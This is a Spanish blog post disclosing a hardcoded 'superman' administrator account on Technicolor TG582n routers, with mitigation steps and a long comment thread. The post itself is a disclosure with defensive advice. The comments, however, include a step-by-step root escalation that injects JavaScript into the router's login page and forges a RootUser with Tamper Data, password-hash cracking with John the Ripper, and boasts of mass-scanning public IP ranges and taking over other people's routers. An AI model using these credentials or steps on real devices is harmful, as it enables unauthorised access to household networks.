Puerta trasera en Technicolor TG582n

st582

Recientemente mi amigo Hans Von que es también aficionado al hackeo de routers me comentó de una cuenta de administración por defecto en los dispositivos Technicolor TG582n (10.2.0.B). Buscando un poco encontramos que ya se ha hablado de esta cuenta en un comentario de jugca7793 que realizó en un video de Youtube hace dos meses.

La cuenta es:

Usuario: superman
Password: superman

[ mlpuser.ini ]
add name=TELMEX password=_CYP2_568a208a7c4180e670d599814b643f8c698908b5799a57a6 role=Administrator hash2=3149ec0a7121b181aa97ea836bda8a85 crypt=sWaoAu6miPuRA defuser=enabled
add name=telmex password=_CYP2_2f06a0e30e68eb96b3563dd2861ab2604e07c9c316b8e160 role=TechnicalSupport hash2=d32acc280ddc4b6c7d2a534813089676 crypt=LUa6VrJGzKlt. defremadmin=enabled
add name=tech password=_CYP2_23260eaf64f1bb0041a955253a67393aa922d9e1993f1346 role=TechnicalSupport hash2=2c836261d72c02cab6d7e9320e1af76e crypt=KSdvrRm6UjiS6
add name=superman password=_CYP2_f05a66f42a0848aaa21cc77c226990d2cd066bc81e0a65ee role=SuperUser hash2=6939edfe6d8030ef2e346945d5771a0f crypt=ITPFBzzBDCF3w

Es posible mitigar esta vulnerablidad cambiando la contraseña de la cuenta y recomiendo deshabilitar la interfaz remota de administración.

Para cambiar la contraseña hay que acceder al dispositivo con la cuenta superman y cambiar la contraseña desde el URL: http://192.168.1.254/cgi/b/users/cfg/changepsswdpopup/

st582b

Para eliminar el acceso remoto es necesario descargar el archivo que contiene la configuración desde el URL: http://192.168.1.254/backup.lp?be=0&l0=1&l1=1&tid=BACKUP_RESTORE y editar el archivo eliminando la línea: ifadd name=HTTP group=wan

st582c

Después de esto hay que ingresar nuevamente al mismo URL y subirlo.

Compartir
Esta entrada fue publicada en Exploits, Investigaciones, Vulnerabilidades. Guarda el enlace permanente.

29 respuestas a Puerta trasera en Technicolor TG582n

  1. andrux dijo:

    Excelente aporte. Yo ingreso a IPs publicas masivas con la pagina http://www.urlopener.com/ y creo la lista con excel jejeje 189.130.2.1 al 189.130.2.254 gracias por compartir este conocimiento. atte. andrux

  2. sdrex0 dijo:

    hahahahaa nms!!… Funciona!

  3. sdrex0 dijo:

    Salaudos.

    Pero veamos, ¿cual fue el método que usaron para descubrir que la contraseña era superman?

    • TuxFed dijo:

      La forma en que descubrí este usuario fue de la siguiente manera:
      Por hay del 1 de octubre de 2012, jugaba con el módem, y me conecte por telnet, y empece a ver que comandos podía ejecutar y vi user, y ejecute user list, y vi al usuario superman, y me pregunte cual será la contraseña, y me dije vamos a probar con superman, y que entra y dije WTF? como es posible que sea lo mismo…
      Y muchos lo consideran como una vulnerabilidad…
      Saludos!!!
      Aqui el video, publicado 4 de octubre de 2012:
      http://www.youtube.com/watch?v=l-vMtNnrIts

      • hkm dijo:

        Felicidades le atinaste al password que era al mismo que el usuario xD. En cuanto a la seguridad del dispositivo, tener la misma cuenta hardcodeada es una vulnerabilidad. Saludos!

  4. sdrex0 dijo:

    Saludos.

    Pues usa DES

  5. gilberto borjas dijo:

    si eliminan la línea: ifadd name=HTTP group=wan le van a dar en la madre al modem
    y tendran que reiniciarlo picandole al boton de atras
    mejor entren al modem con
    usuario superman
    pass superman
    y entonces ejecuten
    http://192.168.1.254/cgi/b/users/cfg/changepsswdpopup/
    ahi cambian la contraseña superman por la que ustedes quieran, mientras no lo reinicien ya no podran ingresar al modem remotamente por que la contraseña ya no la tendran los de telmex
    basta con ejecutar

  6. rastux dijo:

    hola como reseteo la cache de este modem para eliminar la lista de maquinas conectadas al modem?
    se puede via url como en los modems 2wire?

  7. eleazar dijo:

    pues ya que ando por aki voy a enseniarles este pequenio truco y
    ya que estan hablando de esto,,,, veamos como explotarlo al 100%
    ( obtener root y conectarse a travez de telnet al modem desde una ip remota. )

    1.- entra al modem usando: user=superman password=superman
    2.-obten user.ini (se encuentra en hacer backup)

    Root TG784n the easy way

    1) This guide implies that you have somehow obtained user.ini for your ISP router.

    2) Getting user info and hash2
    — Open user.ini
    — Navigate to [ mlpuser.ini ]
    — you should see something like this example from MEO ISP routers – TG784n firmware 10.2.1.D:

    [ mlpuser.ini ]

    add name=Administrator
    password=_CYP2_8ae001dc8a74bc6e607a2e8226ddd02fdbbf4cd23aa512d4 role=Administrator
    hash2=4c0f71fd4ae422b426a4eebec6e8d28b crypt=zzEululifVOf6 deflocadmin=enabled

    add name=meo password=_CYP2_b3f47eb5f04658f714f389ab9362479ba0a947b5255d3469
    role=Administrator hash2=99010e61fcf8b6c41fb97cf64dadf79e crypt=IPboDYcp4oUrE

    add name=sumeo password=_CYP2_7bf31c88f33a6bad4d59a1df0ddfc97e6627cc719c91af4c role=SuperUser hash2=094a55fcfbf4850f0f9eef4b5c1ff490 crypt=bSn.KCkvVpgWY

    add name=Debug password=_CYP2_e1b57ae009db01c58dd6009be1fb24f0d96e4df96dac40bd
    role=RootUser hash2=91cd28f3d8d3a503e9839caaa2929123 crypt=bD0z/Y6EF7zKw

    add name=nauser password=_CYP2_1b6337e5b0a3bb0395695acdedcb203c8cd47d5c8b1785b0
    role=NA hash2=f8700f3bb4e73cc4bb5229def20ce0d0

    — take note of the “hash2″ code from the user “Debug”, in this case is
    “91cd28f3d8d3a503e9839caaa2929123″

    3) Open TG784n web interface, normally by entering 192.168.1.254 in web browser (use GOOGLE CHROME)
    — in username enter Debug
    — the press “ctrl+shift+j” to open the Console Tab
    — the paste this in the console (copy&paste the hash2 code you obtained
    earlier):

    var user = “Debug”;
    var hash2 = “91cd28f3d8d3a503e9839caka2929123″;

    var HA2 = MD5(“GET” + “:” + uri);
    document.getElementById(“user”).value = user;
    document.getElementById(“hidepw”).value = MD5(hash2 + “:” + nonce +
    “:” + “00000001″ + “:” + “xyz” + “:” + qop + “:” + HA2);
    document.authform.submit();

    — press “enter”, you are now root.
    However you still don’t know the root password.
    Don’t worry, we shall create another root. :)

    4) Creating another root user.
    You will need FIREFOX browser and the TAMPER DATA extension.

    — Enter TG784n web interface using the Debug user by the method described earlier, but use FIREFOX (notice that the web-console for this browser is accessed by “ctrl+shift+k” and that you must paste the data from step 3 in the “scrathpad”, press “execute” to run it)

    — As “Debug” Go to “add new User”.
    — Create user. per eg U: admin, Pass: admin,
    — Just don’t press “apply” yet.
    — open TAMPER DATA instead and iniciate it. In this extension, change the field “Adminstrator” to “RootUser” (case sensitive). Press OK.
    Let it save the changes…

    Now you have a new root user = admin.
    You are free to access your router via TELNET.
    Enjoy! :)

  8. Arcanomus dijo:

    ¿Alguien sabe cómo modificar mediante el user.ini los DNS’s de la interfaz “Internet”?

    Ya probé a añadir en la parte de “[ dnss.ini ]” las siguientes líneas:

    add set=0 dns=8.8.8.8 label=None metric=10 intf=Internet owner=PPP
    add set=0 dns=8.8.4.4 label=None metric=10 intf=Internet owner=PPP

    Y el módem se jodió, tuve que resetearlo con botón…

    La idea es poder cambiarlos desde la administración web y no desde Telnet.

    Gracias.

  9. Pingback: ¿Ya revisaste si tu router tiene puertas traseras?

  10. k3lmi dijo:

    muy buena man!!! yo yege a vivir a una casa donde tienen una red algo complicada y su router es de esta marca jaja y funciono el user y pass jaja q loco!!! ahora si me lo adueñare!!!

  11. Armandito dijo:

    Hola, alguien me podría mandare el driver de este módem TG582n, agradezco de antemano, saludos.

  12. ingiscom dijo:

    hola si entiendo aun cierto rasgo esto
    pero pro ejemplo tengo un modem del cual quiero conectarme no tengo la clave y pues obiamente no puedo conectarme a el alguien me explica

    solo he utilizado herramientas como beini para sacar las wep
    ayuda mi correo es lax_las@hotmail.com

  13. izzyneko dijo:

    bueno dejo mi aporte use john the ripper

    este es el archivo user.ini

    add name=superman password=_CYP2_2061d3fe7bee47b5e44ea1b3e841ccc9342865702928742c role=SuperUser hash2=6939edfe6d8030ef2e346945d5771a0f crypt=JCho8neYHJNUE

    donde hash.txt

    JCho8neYHJNUE <—————– esto lo guarde en hash.txt que es esto crypt=JCho8neYHJNUE

    root@bt:/pentest/passwords/john# john –format=crypt hash.txt –session=h

    Loaded 1 password hash (generic crypt(3) [?/64])

    superman (?)
    guesses: 1 time: 0:00:00:00 DONE (Thu Dec 5 18:43:20 2013) c/s: 698 trying: purple – larry
    Use the "–show" option to display all of the cracked passwords reliably

    automaticamente me salio el pasword superman como que ya estaba definido en el john

  14. Ramgar dijo:

    Como puedo cambiar la contraseña de este modem sin tener una linea telmex , este modem me lo pasaron y lo utilizo para mi inter por tv cable pero es alambrico y el ruter si me funciona pero tengo el problema que no puedo ponerle un candado , la conexcion es directa , quiero ponerle una clave para que no me lo pirateen , alguien sabe como hacerlo

  15. Mike dijo:

    alguien tendrá el firmware genérico o el que es para telmex??? por desgracia puse uno que era de una operadora británica y ahora esta inservible, porque no me deja cambiar los valores de VPI/VCI (creo q es por eso)

  16. Miguel dijo:

    AYUDA CON TELNET, QUIERO DESHABILITAR EL BOTON DE ENCENDIDO/APAGADO DEL WIFI QUE TRAE EL MODEM, ESPERO RESPUESTA, DIGANME QUE COMANDO PUEDO USAR.

  17. Pingback: ¿Ya revisaste si tu router tiene puertas traseras? Discusiones

  18. raul campillo dijo:

    Amigos no me pude quedar con las ganas de intentar crackear los otros password
    asi que le pase el john y encontro uno mas ,asi que se me ocurrio hacer un diccionario con crunch de 0-9 10 longitud 103gb y obtuve el de telmex aunque es el resultado que da el john junto al de superman que ya se probo que funciona no entiendo por que con esos no se puede accesar .

    ?:75091397 telmex
    ?:51966576 tech
    ?:superman

    75091397 (?)
    guesses: 1 time: 0:00:13:07 100% c/s: 95409 trying: 75091392 – 75091455
    ./john hashes.txt –wordlist=/home/eterea/Hack/dic/numerico0-9-10len.txt

    Saludos

  19. Jose Antonio dijo:

    Hola a todos, yo eh estado intentar desde hace ya un tiempo con el usuario y la contraseña superman pero ya no me deja, al principio cuando me cambiaron el módem si podía entre, varias veces entre con ese usuario pero llego un día que ya no me dejo entrar, mi pregunta es

    como puedo saber si Telmex arreglo el problema (Por que es un problema ya que te pueden hacer muchos cambios y tu ni enterado) o alguien le cambio la contraseña a ese usuario y también quisiera saber si se le puede cambiar la contraseña.

    Otra me podrían decir si todavía se puede o ya no funciona el usuario superman ya que como les digo a mi ya no me funciona y no creo que alguien se haya metido y la haya cambiado ya que no ha pasado nada raro y ya tiene bastante tiempo casi un año de que no puedo entrar con ese usuario, pero quien sabe a lo mejor de alguna manera esta haciendo algo que yo ni enterado, bueno no creo, pero todos modos tengo la duda…. espero alguien me pueda responder.

  20. David Alejandro dijo:

    Me parto, funciono!!!!xD

  21. Pasqual dijo:

    Technicolor TG582n
    Firmware: 10.2.2.D

    ID: TELMEX
    PW: (wireless access code)

    Does anyone know how to obtain the root userID with this level of firmware? The ID superman/superman does not work with this firmware. Also, none of these methods work for obtaining root:

    [code]
    {TELMEX}=>user list
    User Flags Role
    ---- ----- ----
    TELMEX U Administrator
    telmex R TechnicalSupport
    tech TechnicalSupport

    {TELMEX}=>user config name=tech password=newtech
    [mlp] Current user isn't allowed to config specified user.

    [/code]

  22. asencion dijo:

    Buen dia.
    Solicito de su ayuda, tengo un modem Technicolor TG582n, el cual se me traba al momento de intentar abrir los puertos.
    Estoy buscando una version de firmware, para ver si se corrige el problema.
    Alguien sabe dodne puedo bajarlo.

    gracias

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *


− 2 = tres

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>